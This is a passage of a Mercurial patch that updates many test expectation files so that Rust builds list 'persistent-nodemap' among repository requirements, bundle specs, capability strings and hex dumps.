0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| (no-zstd !) - 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd !) - 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| - 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| + 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (no-zstd !) + 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (no-zstd !) + 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd no-rust !) + 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (zstd no-rust !) + 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (zstd no-rust !) + 0010: 00 00 00 00 0a 69 00 36 67 65 6e 65 72 61 6c 64 |.....i.6generald| (rust !) + 0020: 65 6c 74 61 2c 70 65 72 73 69 73 74 65 6e 74 2d |elta,persistent-| (rust !) + 0030: 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f 67 76 31 |nodemap,revlogv1| (rust !) $ hg debugbundle --spec packed.hg - none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog + none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog (no-rust !) + none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog (rust !) generaldelta requirement is not listed in stream clone bundles unless used @@ -320,17 +328,23 @@ $ cd .. $ hg -R testnongd debugcreatestreamclonebundle packednongd.hg writing 301 bytes for 3 files - bundle requirements: revlogv1 + bundle requirements: revlogv1 (no-rust !) + bundle requirements: persistent-nodemap, revlogv1 (rust !) $ f -B 64 --size --sha1 --hexdump packednongd.hg - packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f + packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f (no-rust !) + packednongd.hg: size=402, sha1=d3cc1417f0e8142cf9340aaaa520b660ad3ec3ea (rust !) 0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 03 00 00 |HGS1UN..........| - 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| - 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| - 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| (no-rust !) + 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| (no-rust !) + 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| (no-rust !) + 0010: 00 00 00 00 01 2d 00 1c 70 65 72 73 69 73 74 65 |.....-..persiste| (rust !) + 0020: 6e 74 2d 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f |nt-nodemap,revlo| (rust !) + 0030: 67 76 31 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 |gv1.data/foo.i.6| (rust !) $ hg debugbundle --spec packednongd.hg - none-packed1;requirements%3Drevlogv1 + none-packed1;requirements%3Drevlogv1 (no-rust !) + none-packed1;requirements%3Dpersistent-nodemap%2Crevlogv1 (rust !) Warning emitted when packed bundles contain secret changesets @@ -344,7 +358,8 @@ $ hg -R testsecret debugcreatestreamclonebundle packedsecret.hg (warning: stream clone bundle will contain secret revisions) writing 301 bytes for 3 files - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) Unpacking packed1 bundles with "hg unbundle" isn't allowed diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -216,13 +216,16 @@ $ f --size --hex --bytes 256 body body: size=112262 (no-zstd !) - body: size=109410 (zstd !) + body: size=109410 (zstd no-rust !) + body: size=109431 (rust !) 0000: 04 6e 6f 6e 65 48 47 32 30 00 00 00 00 00 00 00 |.noneHG20.......| 0010: 7f 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (no-zstd !) 0020: 05 09 04 0c 44 62 79 74 65 63 6f 75 6e 74 39 38 |....Dbytecount98| (no-zstd !) 0030: 37 37 35 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |775filecount1030| (no-zstd !) - 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd !) - 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd !) + 0010: 99 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (zstd no-rust !) + 0010: ae 07 53 54 52 45 41 4d 32 00 00 00 00 03 00 09 |..STREAM2.......| (rust !) + 0020: 05 09 04 0c 5e 62 79 74 65 63 6f 75 6e 74 39 35 |....^bytecount95| (zstd no-rust !) + 0020: 05 09 04 0c 73 62 79 74 65 63 6f 75 6e 74 39 35 |....sbytecount95| (rust !) 0030: 38 39 37 66 69 6c 65 63 6f 75 6e 74 31 30 33 30 |897filecount1030| (zstd !) 0040: 72 65 71 75 69 72 65 6d 65 6e 74 73 64 6f 74 65 |requirementsdote| 0050: 6e 63 6f 64 65 25 32 43 66 6e 63 61 63 68 65 25 |ncode%2Cfncache%| @@ -236,15 +239,24 @@ 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| (no-zstd !) 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| (no-zstd !) 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| (no-zstd !) - 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd !) - 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd !) - 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd !) - 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd !) - 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd !) - 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd !) - 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd !) - 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd !) - 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd !) + 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd no-rust !) + 0070: 43 70 65 72 73 69 73 74 65 6e 74 2d 6e 6f 64 65 |Cpersistent-node| (rust !) + 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd no-rust !) + 0080: 6d 61 70 25 32 43 72 65 76 6c 6f 67 2d 63 6f 6d |map%2Crevlog-com| (rust !) + 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd no-rust !) + 0090: 70 72 65 73 73 69 6f 6e 2d 7a 73 74 64 25 32 43 |pression-zstd%2C| (rust !) + 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd no-rust !) + 00a0: 72 65 76 6c 6f 67 76 31 25 32 43 73 70 61 72 73 |revlogv1%2Cspars| (rust !) + 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd no-rust !) + 00b0: 65 72 65 76 6c 6f 67 25 32 43 73 74 6f 72 65 00 |erevlog%2Cstore.| (rust !) + 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd no-rust !) + 00c0: 00 80 00 73 08 42 64 61 74 61 2f 30 2e 69 00 03 |...s.Bdata/0.i..| (rust !) + 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd no-rust !) + 00d0: 00 01 00 00 00 00 00 00 00 02 00 00 00 01 00 00 |................| (rust !) + 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd no-rust !) + 00e0: 00 00 00 00 00 01 ff ff ff ff ff ff ff ff 80 29 |...............)| (rust !) + 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd no-rust !) + 00f0: 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 d1 |c.I.#....Vg.g,i.| (rust !) --uncompressed is an alias to --stream diff --git a/tests/test-clonebundles.t b/tests/test-clonebundles.t --- a/tests/test-clonebundles.t +++ b/tests/test-clonebundles.t @@ -279,7 +279,8 @@ $ hg -R server debugcreatestreamclonebundle packed.hg writing 613 bytes for 4 files - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) No bundle spec should work diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1628,7 +1628,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no yes no revlog-v2: no yes no plain-cl-delta: yes yes yes @@ -1667,7 +1668,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no yes no revlog-v2: no yes no plain-cl-delta: yes yes yes diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -39,7 +39,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes @@ -54,7 +55,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -426,7 +428,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes @@ -453,7 +456,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes yes no plain-cl-delta: yes yes yes @@ -482,7 +486,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -186,8 +186,10 @@ node trie capacity: 4 node trie count: 2 node trie depth: 1 - node trie last rev scanned: -1 - node trie lookups: 4 + node trie last rev scanned: -1 (no-rust !) + node trie last rev scanned: 3 (rust !) + node trie lookups: 4 (no-rust !) + node trie lookups: 2 (rust !) node trie misses: 1 node trie splits: 1 revs in memory: 3 @@ -654,8 +656,10 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 444 - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: 444 (no-rust !) + remote: 463 (rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 devel-peer-request: protocaps devel-peer-request: caps: * bytes (glob) diff --git a/tests/test-hgweb-commands.t b/tests/test-hgweb-commands.t --- a/tests/test-hgweb-commands.t +++ b/tests/test-hgweb-commands.t @@ -2193,7 +2193,8 @@ lookup pushkey stream-preferred - streamreqs=generaldelta,revlogv1,sparserevlog + streamreqs=generaldelta,revlogv1,sparserevlog (no-rust !) + streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog (rust !) unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash diff --git a/tests/test-init.t b/tests/test-init.t --- a/tests/test-init.t +++ b/tests/test-init.t @@ -21,6 +21,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -60,6 +61,7 @@ $ hg --config format.usestore=false init old $ checknewrepo old generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 testonly-simplestore (reposimplestore !) @@ -72,6 +74,7 @@ store created 00changelog.i created generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -86,6 +89,7 @@ 00changelog.i created fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -100,6 +104,7 @@ 00changelog.i created dotencode fncache + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 store @@ -218,6 +223,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -239,6 +245,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -256,6 +263,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-lfconvert.t b/tests/test-lfconvert.t --- a/tests/test-lfconvert.t +++ b/tests/test-lfconvert.t @@ -99,6 +99,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-lfs-largefiles.t b/tests/test-lfs-largefiles.t --- a/tests/test-lfs-largefiles.t +++ b/tests/test-lfs-largefiles.t @@ -293,6 +293,7 @@ fncache generaldelta lfs + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-narrow-clone-no-ellipsis.t b/tests/test-narrow-clone-no-ellipsis.t --- a/tests/test-narrow-clone-no-ellipsis.t +++ b/tests/test-narrow-clone-no-ellipsis.t @@ -26,6 +26,7 @@ dotencode fncache narrowhg-experimental + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-narrow-clone-stream.t b/tests/test-narrow-clone-stream.t --- a/tests/test-narrow-clone-stream.t +++ b/tests/test-narrow-clone-stream.t @@ -68,6 +68,7 @@ fncache (flat-fncache !) generaldelta narrowhg-experimental + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-narrow-clone.t b/tests/test-narrow-clone.t --- a/tests/test-narrow-clone.t +++ b/tests/test-narrow-clone.t @@ -42,6 +42,7 @@ dotencode fncache narrowhg-experimental + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-narrow-sparse.t b/tests/test-narrow-sparse.t --- a/tests/test-narrow-sparse.t +++ b/tests/test-narrow-sparse.t @@ -61,6 +61,7 @@ fncache generaldelta narrowhg-experimental + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -2,6 +2,9 @@ Test the persistent on-disk nodemap =================================== + +#if no-rust + $ cat << EOF >> $HGRCPATH > [format] > use-persistent-nodemap=yes @@ -9,6 +12,8 @@ > persistent-nodemap=yes > EOF +#endif + $ hg init test-repo --config storage.revlog.persistent-nodemap.slow-path=allow $ cd test-repo diff --git a/tests/test-phases.t b/tests/test-phases.t --- a/tests/test-phases.t +++ b/tests/test-phases.t @@ -886,6 +886,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -914,6 +915,7 @@ fncache generaldelta internal-phase + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -30,6 +30,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -72,6 +73,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -114,6 +116,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -27,6 +27,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -62,6 +63,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -112,6 +114,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-remotefilelog-log.t b/tests/test-remotefilelog-log.t --- a/tests/test-remotefilelog-log.t +++ b/tests/test-remotefilelog-log.t @@ -30,6 +30,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-repo-compengines.t b/tests/test-repo-compengines.t --- a/tests/test-repo-compengines.t +++ b/tests/test-repo-compengines.t @@ -13,6 +13,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -61,6 +62,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -79,6 +81,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -182,6 +185,7 @@ exp-compression-none fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store diff --git a/tests/test-requires.t b/tests/test-requires.t --- a/tests/test-requires.t +++ b/tests/test-requires.t @@ -53,6 +53,7 @@ featuresetup-test fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-revlog-v2.t b/tests/test-revlog-v2.t --- a/tests/test-revlog-v2.t +++ b/tests/test-revlog-v2.t @@ -24,6 +24,7 @@ dotencode exp-revlogv2.2 fncache + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) sparserevlog store diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -176,6 +176,7 @@ dotencode fncache generaldelta + persistent-nodemap revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -202,7 +203,7 @@ Persistent nodemap $ cd $TESTTMP $ rm -rf repository - $ hg init repository + $ hg --config format.use-persistent-nodemap=no init repository $ cd repository $ $NO_FALLBACK rhg debugrequirements | grep nodemap [1] diff --git a/tests/test-sidedata.t b/tests/test-sidedata.t --- a/tests/test-sidedata.t +++ b/tests/test-sidedata.t @@ -56,7 +56,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -70,7 +71,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no yes no plain-cl-delta: yes yes yes @@ -90,7 +92,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes @@ -104,7 +107,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes diff --git a/tests/test-sparse-requirement.t b/tests/test-sparse-requirement.t --- a/tests/test-sparse-requirement.t +++ b/tests/test-sparse-requirement.t @@ -20,6 +20,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -39,6 +40,7 @@ exp-sparse fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -59,6 +61,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-sqlitestore.t b/tests/test-sqlitestore.t --- a/tests/test-sqlitestore.t +++ b/tests/test-sqlitestore.t @@ -17,6 +17,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -32,6 +33,7 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ (no-zstd !) fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -51,6 +53,7 @@ exp-sqlite-comp-001=$BUNDLE2_COMPRESSIONS$ fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -65,6 +68,7 @@ exp-sqlite-comp-001=none fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog diff --git a/tests/test-ssh-bundle1.t b/tests/test-ssh-bundle1.t --- a/tests/test-ssh-bundle1.t +++ b/tests/test-ssh-bundle1.t @@ -486,9 +486,11 @@ sending upgrade request: * proto=exp-ssh-v2-0003 (glob) (sshv2 !) sending hello command sending between command - remote: 444 (sshv1 !) + remote: 444 (sshv1 no-rust !) + remote: 463 (sshv1 rust !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 (sshv1 !) sending protocaps command preparing listkeys for "bookmarks" diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -542,9 +542,11 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 444 (sshv1 !) + remote: 444 (sshv1 no-rust !) + remote: 463 (sshv1 rust !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) - remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !) + remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !) remote: 1 (sshv1 !) devel-peer-request: protocaps devel-peer-request: caps: * bytes (glob) diff --git a/tests/test-stream-bundle-v2.t b/tests/test-stream-bundle-v2.t --- a/tests/test-stream-bundle-v2.t +++ b/tests/test-stream-bundle-v2.t @@ -47,10 +47,12 @@ $ hg debugbundle bundle.hg Stream params: {} stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (no-zstd !) - stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd !) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (zstd no-rust !) + stream2 -- {bytecount: 1693, filecount: 11, requirements: dotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore} (mandatory: True) (rust !) $ hg debugbundle --spec bundle.hg none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlogv1%2Csparserevlog%2Cstore (no-zstd !) - none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (zstd no-rust !) + none-v2;stream=v2;requirements%3Ddotencode%2Cfncache%2Cgeneraldelta%2Cpersistent-nodemap%2Crevlog-compression-zstd%2Crevlogv1%2Csparserevlog%2Cstore (rust !) Test that we can apply the bundle as a stream clone bundle diff --git a/tests/test-treemanifest.t b/tests/test-treemanifest.t --- a/tests/test-treemanifest.t +++ b/tests/test-treemanifest.t @@ -834,9 +834,11 @@ $ hg -R deeprepo debugcreatestreamclonebundle repo-packed.hg writing 5330 bytes for 18 files (no-zstd !) writing 5400 bytes for 18 files (zstd !) - bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest + bundle requirements: generaldelta, revlogv1, sparserevlog, treemanifest (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog, treemanifest (rust !) $ hg debugbundle --spec repo-packed.hg - none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest + none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog%2Ctreemanifest (no-rust !) + none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog%2Ctreemanifest (rust !) #endif diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -61,7 +61,8 @@ generaldelta: yes share-safe: no sparserevlog: yes - persistent-nodemap: no + persistent-nodemap: no (no-rust !) + persistent-nodemap: yes (rust !) copies-sdc: no revlog-v2: no plain-cl-delta: yes @@ -74,7 +75,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -88,7 +90,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -102,7 +105,8 @@ 